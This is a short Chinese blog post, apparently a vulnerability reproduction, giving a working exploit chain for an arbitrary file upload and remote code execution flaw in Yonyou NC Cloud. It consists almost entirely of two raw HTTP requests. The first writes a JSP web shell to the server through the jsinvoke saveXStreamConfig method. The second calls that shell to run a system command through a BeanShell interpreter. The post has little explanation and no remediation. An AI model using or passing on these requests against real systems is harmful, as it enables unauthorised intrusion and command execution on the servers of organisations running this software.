用友-NC-Cloud存在任意文件上传/RCE

漏洞复现：

首先上传jsp

POC：

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.622.93 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/c0nf1g.jsp"]}

访问c0nf1g.jsp构造RCE

POC：

POST /c0nf1g.jsp?error=bsh.Interpreter HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2821.52 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

posted @ 2024-06-26 16:45 都吃泡芙阅读(288) 评论(0) 收藏举报

刷新页面返回顶部

pa0fu

用友-NC-Cloud存在任意文件上传/RCE

公告